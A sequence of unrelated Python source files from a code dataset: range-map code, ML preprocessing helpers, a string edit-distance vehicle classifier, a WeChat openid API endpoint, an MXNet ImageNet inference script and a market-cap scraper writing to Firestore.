max(bisect_left(self.lower_cuts, start) - 1, 0)\n ovlapUpperInd = bisect_left(self.lower_cuts, end)\n # Create queue of values that need to be generated\n yield_vals = deque()\n # Create dictionary of values to be generated -> indices containing them\n vals_inds_dict = {}\n for i in range(ovlapLowerInd, ovlapUpperInd):\n # Check if anything can be released from the queue\n while len(yield_vals) > 0:\n if vals_inds_dict[yield_vals[0]][-1] < i - 1:\n # Yield the full range, value. Remove value from queue\n val = yield_vals.popleft()\n yield Range(max(self.lower_cuts[vals_inds_dict[val][0]], start),\n min(self.upper_cuts[vals_inds_dict[val][-1]], end)), val\n # Remove value from dict\n del vals_inds_dict[val]\n else:\n break\n try:\n # Get intersection of the ranges\n intersect = bounding_range.intersection(self.ranges[i])\n if not intersect.is_empty():\n # If overlapping with this range, put into queue\n for val in self.items[i]:\n if val not in vals_inds_dict:\n yield_vals.append(val)\n vals_inds_dict[val] = deque()\n vals_inds_dict[val].append(i)\n except ValueError:\n # Continue if no overlap with this range\n continue\n ## Yield remaining values\n while len(yield_vals) > 0:\n # Yield the full range, value. Remove value from queue\n val = yield_vals.popleft()\n yield Range(max(self.lower_cuts[vals_inds_dict[val][0]], start),\n min(self.upper_cuts[vals_inds_dict[val][-1]], end)), val\n # Remove value from dict\n del vals_inds_dict[val]\n\n def get(self, key):\n \"\"\" Get the item(s) corresponding to a given key. The key can be a\n Range or a single value that is within a Range\n\n Parameters\n ----------\n key : comparable\n A single value or Range object\n\n Raises\n ------\n KeyError\n If there is no overlap with the key\n ValueError\n If the key type not compatible with the ranges\n \n Returns\n -------\n A set containing all overlapping items\n \"\"\"\n if not self.overlaps(key):\n self.__missing__(key)\n elif isinstance(key, Range):\n # If this is a single value\n return_set = set()\n # Get the bounding indices\n ovlapLowerInd = max(bisect_left(self.lower_cuts, key.lower_cut) - 1, 0)\n ovlapUpperInd = bisect_left(self.lower_cuts, key.upper_cut)\n for i in range(ovlapLowerInd, ovlapUpperInd):\n try:\n # Get intersection of the ranges\n intersect = key.intersection(self.ranges[i])\n if not intersect.is_empty():\n # If overlapping with this range, put its\n # item in the return set\n return_set = return_set.union(self.items[i])\n except ValueError:\n # Continue if no overlap with this range\n continue\n # Return the set of items\n return return_set\n else:\n # If this is a single value\n # Get the index of the range containing the value\n lower_ind = max(bisect_left(self.lower_cuts, key) - 1, 0)\n # Return the item at that value\n return self.items[lower_ind]\n\n def put(self, key, val):\n \"\"\" Creates a mapping from a Range to a value, adding to\n any existing values over that Range\n\n Parameters\n ----------\n key : Range object\n A Range to serve as a key\n val : value, hashable\n Some value that the Range should map to\n\n Raises\n ------\n TypeError\n If the key is not a Range object or value is not hashable\n \"\"\"\n if not isinstance(key, Range):\n raise TypeError(\"key is not a Range\")\n elif not any((isinstance(val, Hashable), self.recurse_add)):\n raise TypeError(\"value not hashable\")\n elif key.is_empty():\n # Skip if this is an empty range\n return\n # Figure out where to the key/value\n if not self.overlaps(key):\n # If this range is completely on its own, just insert\n insert_ind = bisect_left(self.lower_cuts, key.lower_cut)\n self.ranges.insert(insert_ind, key)\n self.lower_cuts.insert(insert_ind, key.lower_cut)\n self.upper_cuts.insert(insert_ind, key.upper_cut)\n if not isinstance(val, set):\n self.items.insert(insert_ind, set([val]))\n else:\n self.items.insert(insert_ind, val)\n return\n else:\n # If this range has some overlap with existing ranges\n ovlap_lower_ind = max(bisect_left(self.lower_cuts, key.lower_cut) - 1, 0)\n ovlap_upper_ind = bisect_left(self.lower_cuts, key.upper_cut)\n # Create queue ranges to add\n add_ranges = deque()\n # Create queue of items to add\n add_items = deque()\n # Keep track of next lower cutpoint to add\n next_lower_cut = key.lower_cut\n for i in range(ovlap_lower_ind, ovlap_upper_ind):\n try:\n # Get intersection of the ranges\n intersect = key.intersection(self.ranges[i])\n if not intersect.is_empty():\n # Add in a Range between the next LowerCut and\n # the beginning of this intersection if necessary\n if next_lower_cut < intersect.lower_cut:\n add_ranges.append(Range(next_lower_cut, intersect.lower_cut))\n add_items.append(val)\n next_lower_cut = intersect.lower_cut\n if intersect == self.ranges[i]:\n ## If key encompassing existing Range ##\n # Add item to this range\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n elif self.lower_cuts[i] == intersect.lower_cut:\n ## If key upper cutpoint enclosed by existing Range ##\n # Add in the rest of the original Range\n if self.upper_cuts[i] > intersect.upper_cut:\n add_ranges.append(Range(intersect.upper_cut,\n self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n # Define original part to be shorter \n self.upper_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n elif self.upper_cuts[i] == intersect.upper_cut:\n ## If key lower cutpoint enclosed by existing Range ##\n # Add in the rest of the original Range\n if intersect.lower_cut > self.lower_cuts[i]:\n add_ranges.append(Range(self.lower_cuts[i], intersect.lower_cut))\n add_items.append(set(self.items[i]))\n # Define original part to be shorter\n self.lower_cuts[i] = intersect.lower_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n else:\n # If entire key enclosed by existing Range\n # Add in lower part of original Range\n add_ranges.append(Range(self.lower_cuts[i], intersect.lower_cut))\n add_items.append(set(self.items[i]))\n # Add in upper part of original Range\n add_ranges.append(Range(intersect.upper_cut, self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n # Define original part to be middle\n self.lower_cuts[i] = intersect.lower_cut\n self.upper_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(intersect.lower_cut, intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n except ValueError:\n # Continue if no overlap with this range\n continue\n # Put in a last range if necessary\n if next_lower_cut < key.upper_cut:\n add_ranges.append(Range(next_lower_cut, key.upper_cut))\n add_items.append(val)\n # Use recursive call to place the pairs, which now\n # should not overlap with any other ranges\n self.recurse_add = True\n while len(add_ranges) > 0:\n self.put(add_ranges.pop(), add_items.pop())\n self.recurse_add = False\n\n def remove(self, a_range):\n \"\"\" Removes a range and its value(s) from the range set\n\n Parameters\n ----------\n a_range : A Range object\n The Range to remove\n\n Raises\n ------\n ValueError\n If removing range of type not compatible with previously\n added ranges\n TypeError\n If not a Range\n \"\"\"\n if not isinstance(a_range, Range):\n raise TypeError(\"a_range is not a Range\")\n elif a_range.is_empty():\n # Skip if this is an empty range\n return\n # Check for compatibility of types if necessary\n if len(self) > 0:\n if not (issubclass(a_range.lower_cut.the_type,\n self.ranges[0].lower_cut.the_type) or \\\n issubclass(self.ranges[0].lower_cut.the_type,\n a_range.lower_cut.the_type)):\n raise ValueError(\"Range not compatible with previously added ranges\")\n # Check if the range actually overlaps with the key set\n if not self.overlaps(a_range):\n return\n else:\n # There's some overlap, so deal with that\n # Determine where overlap occurs\n ovlap_lower_ind = max(bisect_left(self.lower_cuts,\n a_range.lower_cut) - 1, 0)\n ovlap_upper_ind = bisect_left(self.lower_cuts, a_range.upper_cut)\n # Create queue of indices marked for removal\n remove_ranges = deque()\n # Create queue of ranges to add\n add_ranges = deque()\n # Create queue of items to add with the add_ranges\n add_items = deque()\n for i in range(ovlap_lower_ind, ovlap_upper_ind):\n try:\n # Get intersection of the ranges\n intersect = a_range.intersection(self.ranges[i])\n if not intersect.is_empty():\n if intersect == self.ranges[i]:\n # Mark range for removal\n remove_ranges.append(i)\n elif self.lower_cuts[i] == intersect.lower_cut:\n # If equal on the left cutpoint, subtract\n # out left part\n self.lower_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(intersect.upper_cut,\n self.upper_cuts[i])\n elif self.upper_cuts[i] == intersect.upper_cut:\n # If equal on right cutpoint, subtract out\n # right part\n self.upper_cuts[i] = intersect.lower_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.lower_cut)\n else:\n # If in the middle, split into two parts, putting\n # both in add queue and placing the old range index\n # into the remove queue\n add_ranges.append(Range(self.lower_cuts[i],\n intersect.lower_cut))\n add_items.append(set(self.items[i]))\n add_ranges.append(Range(intersect.upper_cut,\n self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n remove_ranges.append(i)\n except ValueError:\n # Continue if no overlap with this range\n continue\n # Remove any ranges that are marked for removal\n while len(remove_ranges) > 0:\n remove_ind = remove_ranges.pop()\n self.ranges.pop(remove_ind)\n self.lower_cuts.pop(remove_ind)\n self.upper_cuts.pop(remove_ind)\n self.items.pop(remove_ind)\n # Add any pairs that need to be added\n self.recurse_add = True\n while len(add_ranges) > 0:\n self.put(add_ranges.pop(), add_items.pop())\n self.recurse_add = False\n","repo_name":"lepy/sdata","sub_path":"sdata/contrib/ranger/collections/rangebucketmap.py","file_name":"rangebucketmap.py","file_ext":"py","file_size_in_byte":16130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18345225609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 11:42:23 2018\n\n@author: Margarida Costa\n\"\"\"\nimport pandas as pd\n# loading libraries\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom imblearn.over_sampling import SMOTE,RandomOverSampler\nfrom imblearn.under_sampling import RandomUnderSampler\nimport matplotlib.pyplot as plt\n\n\ndef plot_2d_space(X, y, label='Classes'): \n colors = ['#1F77B4', '#FF7F0E']\n markers = ['o', 's']\n for l, c, m in zip(np.unique(y), colors, markers):\n plt.scatter(\n X[y==l, 0],\n X[y==l, 1],\n c=c, label=l, marker=m\n )\n plt.title(label)\n plt.legend(loc='upper right')\n plt.show()\n\n#Returns the data file. The class cls is obligatory for the method meanByClass and medianByClass\ndef treatMissingValues(df, method, cl=None):\n if method == \"constant\":\n #1. use a global constant to fill in for missing values\n df = df.fillna(-1)\n elif method == \"mean\":\n #2. use attribute mean (or median if its discrete) for that column with na\n df = df.fillna(df.mean())\n elif method == \"meanByClass\":\n #3. use attribute mean (or median if its discrete) for the rows with certain class of the column with na\n for el in df[cl].unique():\n for col in df.columns[df.isna().any()].tolist():\n df = df.fillna(df.loc[el,col].mean())\n \n \n elif method == \"clustering\":\n #todo\n pass\n elif method == \"drop\": \n #6. Dropping axis labels with missing data\n df = df.dropna(axis=1)\n elif method == \"interpolation\": \n #5. interpolation\n df = df.interpolate()\n elif method == \"median\":\n #6. use attribute median for that column with na\n df = df.fillna(df.median())\n elif method == \"medianByClass\":\n #7. use attribute median for the rows with certain class of the column with na\n for el in df[cl].unique():\n for col in df.columns[df.isna().any()].tolist():\n df = df.fillna(df.loc[el,col].median())\n \n return df\n\n#Use for symbolic attributes with just 2 possible values. Doesn't create new columns. Returns de data file.\ndef treatSymbolicBinaryAtts(df, att, positiveClass):\n print(\"att\", att)\n df[att] = np.array([ 1 if v == positiveClass else 0 for v in df[att] ])\n return df\n\n#Use for symbolic with more than 2 possible values. Creates new columns with binary values for each symbolic class. Returns the data file.\ndef treatSymbolicAtt(df):\n label_encoder = LabelEncoder()\n dummy_encoder = OneHotEncoder()\n pdf = pd.DataFrame()\n for att in df.columns:\n if df[att].dtype == np.float64 or df[att].dtype == np.int64:\n pdf = pd.concat([pdf, df[att]], axis=1)\n else:\n if len(df[att].unique()) != 2:\n df[att] = label_encoder.fit_transform(df[att])\n # Fitting One Hot Encoding on train data\n temp = dummy_encoder.fit_transform(df[att].values.reshape(-1,1)).toarray()\n # Changing encoded features into a dataframe with new column names\n temp = pd.DataFrame(temp,\n columns=[(att + \"_\" + str(i)) for i in df[att].value_counts().index])\n # In side by side concatenation index values should be same\n # Setting the index values similar to the data frame\n temp = temp.set_index(df.index.values)\n # adding the new One Hot Encoded varibales to the dataframe\n pdf = pd.concat([pdf, temp], axis=1)\n \n \n \n return pdf\n\t\n#Returns the new X and Y for the already balanced data.\ndef treatUnbalancedData(df, method):\n X_train = df.drop( 'class', axis=1 ).values\n y_train = df[ 'class' ].values\n X_new = 0\n y_new = 0\n if(method == \"SMOTE\"):\n sm = SMOTE(random_state=12, ratio = 1.0)\n X_new, y_new = sm.fit_sample(X_train, y_train)\n #plot_2d_space(X_new, y_new, 'SMOTE')\n \n #random oversampling\n elif(method == \"oversampling\"):\n ros = RandomOverSampler()\n X_new, y_ros = ros.fit_sample(X_train, y_train)\n print(X_new.shape[0] - X_new.shape[0], 'new random picked points')\n #plot_2d_space(X_new, y_new, 'Random over-sampling')\n elif(method == \"undersampling\"):\n #random undersampling\n rus = RandomUnderSampler(return_indices=True)\n X_new, y_new, id_rus = rus.fit_sample(X_train, y_train)\n print('Removed indexes:', id_rus)\n #plot_2d_space(X_new, y_new, 'Random under-sampling')\n\n return X_new, y_new\n","repo_name":"pcostam/CD","sub_path":"proj/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"11992693688","text":"\"\"\"\nThis method was based on these papers:\n\n[1] OOMMEN, B. John; LOKE, Richard KS. Pattern recognition of strings with\nsubstitutions, insertions, deletions and generalized transpositions.\nPattern Recognition, 1997, vol. 30, no 5, p. 789-800.\n\n[2] D.W. van Boxel, MSc and Ing. R.A. van Lieshout, MSc. Optimization Vehicle\nClassification, 2003.\n\n[3] VAN BOXEL, D. W.; VAN LIESHOUT, R. A.; VAN DOORN, R. A.\nWeigh-in-Motion–Categorising vehicles.\n\n\"\"\"\nimport numpy as np\nimport numba as nb\n\n\ndef layout(data):\n \"\"\"\n Distances data in meters (veh_length, *axle_sep)\n\n The first value of the list is the vehicle's length.\n\n :param data: values of vehicle's length and axles distances\n :type data: tuple of float\n \"\"\"\n ms_layout = '-O'\n cum_length = 100\n\n veh_length, *axle_sep = data\n veh_length *= 100\n axle_sep = [x*100 for x in axle_sep]\n\n axle_count = len(axle_sep) + 1\n\n i = 0\n limit_i = axle_count - 1\n while i < limit_i:\n j = 0\n limit_j = axle_sep[i] // 50\n while j < limit_j:\n ms_layout += '-'\n j += 1\n ms_layout += 'O'\n cum_length = cum_length + axle_sep[i] + 50\n i += 1\n\n ms_layout += '-'\n cum_length += 50\n\n i = 0\n limit_i = ((veh_length - cum_length) // 50) - 0\n while i < limit_i:\n ms_layout += '-'\n i += 1\n\n return ms_layout\n\n\ndef layout_to_int(vehicle_layout):\n layout_int = []\n for letter in vehicle_layout:\n layout_int.append(ord(letter))\n return np.array(layout_int, dtype=int)\n\n\n@nb.njit(nb.i8(nb.int8, nb.int8))\ndef d_s(a, b):\n \"\"\"\n d_s is a map from A X A -> R^+ and is called the Substitution Map. In\n particular, d_s(a, b) is the distance associated with substituting\n b for a, a,b ∈ A. For all a ∈ A, d_s(a,a) is generally assigned the value\n zero, although this is not Mandatory.\n\n \"\"\"\n tilde = 126 # ~ 126\n hyphen = 45 # - 45\n star = 42 # * 42\n return (\n 0 if a == b else\n 0 if a == tilde and b == hyphen else # '~' '-'\n 0 if a == hyphen and b == tilde else # '-' '~'\n 0 if a == star and b == hyphen else # '*' '-'\n 0 if a == hyphen and b == star else # '-' '*'\n 100\n )\n\n\n@nb.njit(nb.i8(nb.int8))\ndef d_i(a):\n \"\"\"\n d_i(.) is a map from A -> R^+ and is called the Insertion Map. The quantity\n d_i(a) is the distance associated with inserting the symbol a ∈ A.\n\n \"\"\"\n tilde = 126 # ~ 126\n hyphen = 45 # - 45\n star = 42 # * 42\n return (\n 2 if a == hyphen else # '-'\n 1 if a == tilde else # '~'\n 3 if a == star else # '*'\n 100\n )\n\n\n@nb.njit(nb.i8(nb.int8))\ndef d_e(a):\n \"\"\"\n d_e(.) is a map from A -> R^+ and is called the Deletion or Erasure Map.\n The quantity d e (a) is the distance associated with deleting (or erasing)\n the symbol a ∈ A.\n\n \"\"\"\n tilde = 126 # ~ 126\n hyphen = 45 # - 45\n star = 42 # * 42\n return (\n 2 if a == hyphen else # '-'\n 1 if a == tilde else # '~'\n 3 if a == star else # '*'\n 100\n )\n\n\n@nb.njit(nb.i8(nb.int8, nb.int8, nb.int8, nb.int8))\ndef d_t(a, b, c, d):\n \"\"\"\n d t (.,.) is a map from A 2 X A 2 -> R^+ called the Transposition Map. The\n quantity d t (ab,cd) is the distance associated with transposing the string\n \"ab\" into \"cd\". This can be thought of as a \"serial\" operation: \"ab\" is\n first transposed to \"ba\" and subsequently the individual characters are\n substitute d.\n\n \"\"\"\n return (\n 0 if a == b and a == c and a == d else\n 2 if a == d and b == c else\n d_s(a, d) + d_s(b, c)\n )\n\n\n@nb.njit()\ndef D(x, y, Z):\n \"\"\"\n\n Input: The strings X = x 1 ...x N and Y = y 1 ...y M , and the set of\n elementary edit distances defined using the five elementary functions\n d s (.,.), d i (.), d e (.,.), d t (.,.).\n Output : The distance D(X, Y) associated with editing X to Y using the SID\n and GT operations.\n :param x:\n :param y:\n :param Z: np.zeros((N, M))\n \"\"\"\n N = len(x)\n M = len(y)\n\n # Z = np.zeros((N, M))\n i = 1\n while i < N:\n Z[i, 0] = Z[i-1, 0] + d_e(x[i])\n i += 1\n\n j = 1\n while j < M:\n Z[0, j] = Z[0, j-1] + d_i(y[j])\n j += 1\n\n i = 1\n while i < N:\n Z[i, 1] = min(\n Z[i-1, 1] + d_e(x[i]), Z[i, 0] + d_i(y[1]),\n Z[i-1, 0] + d_s(x[i], y[1])\n )\n i += 1\n\n j = 2\n while j < M:\n Z[1, j] = min(\n Z[1, j-1] + d_i(y[j]), Z[0, j] + d_e(x[1]),\n Z[0, j-1] + d_s(x[1], y[j])\n )\n j += 1\n\n i = 2\n while i < N:\n j = 2\n while j < M:\n Z[i, j] = min(\n Z[i-1, j] + d_e(x[i]),\n Z[i, j-1] + d_i(y[j]),\n Z[i-1, j-1] + d_s(x[i], y[j]),\n Z[i-2, j-2] + d_t(x[i-1], x[i], y[j-1], y[j])\n )\n j += 1\n i += 1\n return Z[N-1, M-1]\n","repo_name":"OpenWIM/pywim","sub_path":"pywim/estimation/vehicular_classification/dww.py","file_name":"dww.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"6835799677","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/10/18\n# @Author : Sanzro Lee\n# @Contact : sanzrolee@gmail.com\n# @File : MiniProgremCode.py.py\n# @Software: PyCharm\n\"\"\"\n小程序数据操作\n\"\"\"\n\nfrom fastapi import APIRouter\n# 微信小程序获取openid\nimport requests\n\n# 因小程序id为测试号,所以无法获得手机号,故注释此文件\n# from WXBizDataCrypt import WXBizDataCrypt\n\nrouter = APIRouter()\n\n\n# 微信小程序获得openid\n@router.post('/api/code', summary=\"小程序获得openid\")\ndef user_wxlogin(appid, secret, code):\n params = {\n 'appid': appid,\n 'secret': secret,\n 'js_code': code,\n 'grant_type': 'authorization_code'\n }\n url = 'https://api.weixin.qq.com/sns/jscode2session'\n r = requests.get(url, params=params)\n openid = r.json().get('openid', '')\n session_key = r.json().get('session_key', '')\n return {'openid': openid, 'session_key': session_key}\n","repo_name":"Sanzro-Lee/HELPER_FACTION_official_back_end_api","sub_path":"app/api/v1/MiniProgremCode/MiniProgremCode.py","file_name":"MiniProgremCode.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41167494959","text":"import argparse\nimport logging\nimport os\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import nd\nfrom mxnet.contrib.quantization import *\n\n\ndef download_dataset(dataset_url, dataset_dir, logger=None):\n if logger is not None:\n logger.info('Downloading dataset for inference from %s to %s' % (dataset_url, dataset_dir))\n mx.test_utils.download(dataset_url, dataset_dir)\n\n\ndef load_model(symbol_file, param_file, logger=None):\n cur_path = os.path.dirname(os.path.realpath(__file__))\n symbol_file_path = os.path.join(cur_path, symbol_file)\n if logger is not None:\n logger.info('Loading symbol from file %s' % symbol_file_path)\n symbol = mx.sym.load(symbol_file_path)\n\n param_file_path = os.path.join(cur_path, param_file)\n if logger is not None:\n logger.info('Loading params from file %s' % param_file_path)\n save_dict = nd.load(param_file_path)\n arg_params = {}\n aux_params = {}\n for k, v in save_dict.items():\n tp, name = k.split(':', 1)\n if tp == 'arg':\n arg_params[name] = v\n if tp == 'aux':\n aux_params[name] = v\n return symbol, arg_params, aux_params\n\n\ndef advance_data_iter(data_iter, n):\n assert n >= 0\n if n == 0:\n return data_iter\n has_next_batch = True\n while has_next_batch:\n try:\n data_iter.next()\n n -= 1\n if n == 0:\n return data_iter\n except StopIteration:\n has_next_batch = False\n\n\ndef score(sym, arg_params, aux_params, data, devs, label_name, max_num_examples, logger=None):\n metrics = [mx.metric.create('acc'),\n mx.metric.create('top_k_accuracy', top_k=5)]\n if not isinstance(metrics, list):\n metrics = [metrics, ]\n mod = mx.mod.Module(symbol=sym, context=devs, label_names=[label_name, ])\n mod.bind(for_training=False,\n data_shapes=data.provide_data,\n label_shapes=data.provide_label)\n mod.set_params(arg_params, aux_params)\n\n tic = time.time()\n num = 0\n for batch in data:\n mod.forward(batch, is_train=False)\n for m in metrics:\n mod.update_metric(m, batch.label)\n num += batch_size\n if max_num_examples is not None and num >= max_num_examples:\n break\n\n speed = num / (time.time() - tic)\n\n if logger is not None:\n logger.info('Finished inference with %d images' % num)\n logger.info('Finished with %f images per second', speed)\n logger.warn('Note: GPU performance is expected to be slower than CPU. Please refer quantization/README.md for details')\n for m in metrics:\n logger.info(m.get())\n\n\ndef benchmark_score(symbol_file, ctx, batch_size, num_batches, data_layer_type, logger=None):\n # get mod\n cur_path = os.path.dirname(os.path.realpath(__file__))\n symbol_file_path = os.path.join(cur_path, symbol_file)\n if logger is not None:\n logger.info('Loading symbol from file %s' % symbol_file_path)\n sym = mx.sym.load(symbol_file_path)\n mod = mx.mod.Module(symbol=sym, context=ctx)\n if data_layer_type == \"int8\":\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.int8)\n elif data_layer_type == 'uint8':\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.uint8)\n else: # float32\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.float32)\n mod.bind(for_training=False,\n inputs_need_grad=False,\n data_shapes=[dshape])\n mod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n\n # get data\n if data_layer_type == \"float32\":\n data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=ctx, dtype=data_layer_type)\n for _, shape in mod.data_shapes]\n else:\n data = [mx.nd.full(shape=shape, val=127, ctx=ctx, dtype=data_layer_type)\n for _, shape in mod.data_shapes]\n batch = mx.io.DataBatch(data, []) # empty label\n\n # run\n dry_run = 5 # use 5 iterations to warm up\n for i in range(dry_run+num_batches):\n if i == dry_run:\n tic = time.time()\n mod.forward(batch, is_train=False)\n for output in mod.get_outputs():\n output.wait_to_read()\n\n # return num images per second\n return num_batches*batch_size/(time.time() - tic)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Score a model on a dataset')\n parser.add_argument('--ctx', type=str, default='gpu')\n parser.add_argument('--benchmark', type=bool, default=False, help='dummy data benchmark')\n parser.add_argument('--symbol-file', type=str, required=True, help='symbol file path')\n parser.add_argument('--param-file', type=str, required=False, help='param file path')\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--label-name', type=str, default='softmax_label')\n parser.add_argument('--dataset', type=str, required=False, help='dataset path')\n parser.add_argument('--rgb-mean', type=str, default='0,0,0')\n parser.add_argument('--rgb-std', type=str, default='1,1,1')\n parser.add_argument('--image-shape', type=str, default='3,224,224')\n parser.add_argument('--data-nthreads', type=int, default=60, help='number of threads for data decoding')\n parser.add_argument('--num-skipped-batches', type=int, default=0, help='skip the number of batches for inference')\n parser.add_argument('--num-inference-batches', type=int, required=True, help='number of images used for inference')\n parser.add_argument('--shuffle-dataset', action='store_true', default=True,\n help='shuffle the calibration dataset')\n parser.add_argument('--shuffle-chunk-seed', type=int, default=3982304,\n help='shuffling chunk seed, see'\n ' https://mxnet.incubator.apache.org/api/python/io/io.html?highlight=imager#mxnet.io.ImageRecordIter'\n ' for more details')\n parser.add_argument('--shuffle-seed', type=int, default=48564309,\n help='shuffling seed, see'\n ' https://mxnet.incubator.apache.org/api/python/io/io.html?highlight=imager#mxnet.io.ImageRecordIter'\n ' for more details')\n parser.add_argument('--data-layer-type', type=str, default=\"float32\",\n choices=['float32', 'int8', 'uint8'],\n help='data type for data layer')\n\n args = parser.parse_args()\n\n if args.ctx == 'gpu':\n ctx = mx.gpu(0)\n elif args.ctx == 'cpu':\n ctx = mx.cpu(0)\n else:\n raise ValueError('ctx %s is not supported in this script' % args.ctx)\n\n logging.basicConfig()\n logger = logging.getLogger('logger')\n logger.setLevel(logging.INFO)\n\n symbol_file = args.symbol_file\n param_file = args.param_file\n data_nthreads = args.data_nthreads\n\n batch_size = args.batch_size\n logger.info('batch size = %d for inference' % batch_size)\n\n rgb_mean = args.rgb_mean\n logger.info('rgb_mean = %s' % rgb_mean)\n rgb_mean = [float(i) for i in rgb_mean.split(',')]\n mean_args = {'mean_r': rgb_mean[0], 'mean_g': rgb_mean[1], 'mean_b': rgb_mean[2]}\n rgb_std = args.rgb_std\n logger.info('rgb_std = %s' % rgb_std)\n rgb_std = [float(i) for i in rgb_std.split(',')]\n std_args = {'std_r': rgb_std[0], 'std_g': rgb_std[1], 'std_b': rgb_std[2]}\n combine_mean_std = {}\n combine_mean_std.update(mean_args)\n combine_mean_std.update(std_args)\n\n label_name = args.label_name\n logger.info('label_name = %s' % label_name)\n\n image_shape = args.image_shape\n data_shape = tuple([int(i) for i in image_shape.split(',')])\n logger.info('Input data shape = %s' % str(data_shape))\n\n data_layer_type = args.data_layer_type\n if args.benchmark == False:\n dataset = args.dataset\n download_dataset('http://data.mxnet.io/data/val_256_q90.rec', dataset)\n logger.info('Dataset for inference: %s' % dataset)\n\n # creating data iterator\n data = mx.io.ImageRecordIter(\n path_imgrec=dataset,\n label_width=1,\n preprocess_threads=data_nthreads,\n batch_size=batch_size,\n data_shape=data_shape,\n label_name=label_name,\n rand_crop=False,\n rand_mirror=False,\n shuffle=args.shuffle_dataset,\n shuffle_chunk_seed=args.shuffle_chunk_seed,\n seed=args.shuffle_seed,\n dtype=data_layer_type,\n ctx=args.ctx,\n **combine_mean_std)\n\n # loading model\n sym, arg_params, aux_params = load_model(symbol_file, param_file, logger)\n\n # make sure that fp32 inference works on the same images as calibrated quantized model\n logger.info('Skipping the first %d batches' % args.num_skipped_batches)\n data = advance_data_iter(data, args.num_skipped_batches)\n\n num_inference_images = args.num_inference_batches * batch_size\n logger.info('Running model %s for inference' % symbol_file)\n score(sym, arg_params, aux_params, data, [ctx], label_name,\n max_num_examples=num_inference_images, logger=logger)\n else:\n logger.info('Running model %s for inference' % symbol_file)\n speed = benchmark_score(symbol_file, ctx, batch_size, args.num_inference_batches, data_layer_type, logger)\n logger.info('batch size %2d, image/sec: %f', batch_size, speed)\n","repo_name":"hpi-xnor/BMXNet-v2","sub_path":"example/quantization/imagenet_inference.py","file_name":"imagenet_inference.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"51"} +{"seq_id":"29547937780","text":"from cmath import nan\nfrom opcode import stack_effect\nimport pytz\nfrom bs4 import BeautifulSoup\nimport requests\nfrom datetime import datetime, timedelta\nimport time\nfrom firebase_admin import firestore\nimport yfinance as yf\nimport pandas as pd\nimport numpy as np\nimport timeit\nimport json\nfrom google.oauth2 import service_account\nfrom google.cloud.firestore import Client\nfrom secret import access_secret\nfrom settings import project_id, firebase_database, fx_api_key, firestore_api_key, google_sheets_api_key, schedule_function_key, firebase_auth_api_key\nfrom googleapiclient.discovery import build\nfrom tools import export_gs_func\n\n\n\n\nfirestore_api_key = access_secret(firestore_api_key, project_id)\nfirestore_api_key_dict = json.loads(firestore_api_key)\nfbcredentials = service_account.Credentials.from_service_account_info(firestore_api_key_dict)\ndb = Client(firebase_database, fbcredentials)\n\ngoogle_sheets_api_key = access_secret(google_sheets_api_key, project_id)\ngoogle_sheets_api_key_dict = json.loads(google_sheets_api_key)\ngscredentials = service_account.Credentials.from_service_account_info(google_sheets_api_key_dict)\nREQUIRED_SPREADSHEET_ID = '1_lobEzbiuP9TE2UZqmqSAwizT8f2oeuZ8mVuUTbBAsA'\nservice = build('sheets', 'v4', credentials=gscredentials)\nsheet = service.spreadsheets()\n\n\n# ##################################################################################################\n# ######### Updating tickerlist from companiesmarketcap.com into firebase ##########################\n# ##################################################################################################\n\n# #updating the tickerlist by checking if all the tickers in companiesmarketcap is updated.\n# #if not it will copy the ticker to firebase collection - tickerlist\n# tz_SG = pytz.timezone('Singapore')\n# datetime_SG = datetime.now(tz_SG)\n# maxpages = 70\n# for i in range(1,maxpages):\n# time.sleep(0.5)\n# r = requests.get('https://companiesmarketcap.com/page/' + str(i))\n# soup = BeautifulSoup(r.text, 'html.parser')\n# results1 = soup.find_all(attrs={\"class\":'company-code'})\n# results2 = soup.find_all(attrs={\"class\":'company-name'})\n# #market cap\n# results3 = soup.find_all(attrs={\"class\":'td-right'})\n# print (\"page number \" + str(i) )\n\n# if len(results1) > 0:\n# #k count is to get the company name in results2 which is in a different dataset than results1\n# k = 0\n# for j in results1:\n# #get ticker\n# ticker = j.contents[1]\n# #check if ticker is inside firebase\n# if not db.collection('tickerlisttest').where(\"ticker\", \"==\", ticker).get():\n# #get name\n# tickername = str(results2[k].contents[0]).strip()\n\n# #loading data into firebase\n# 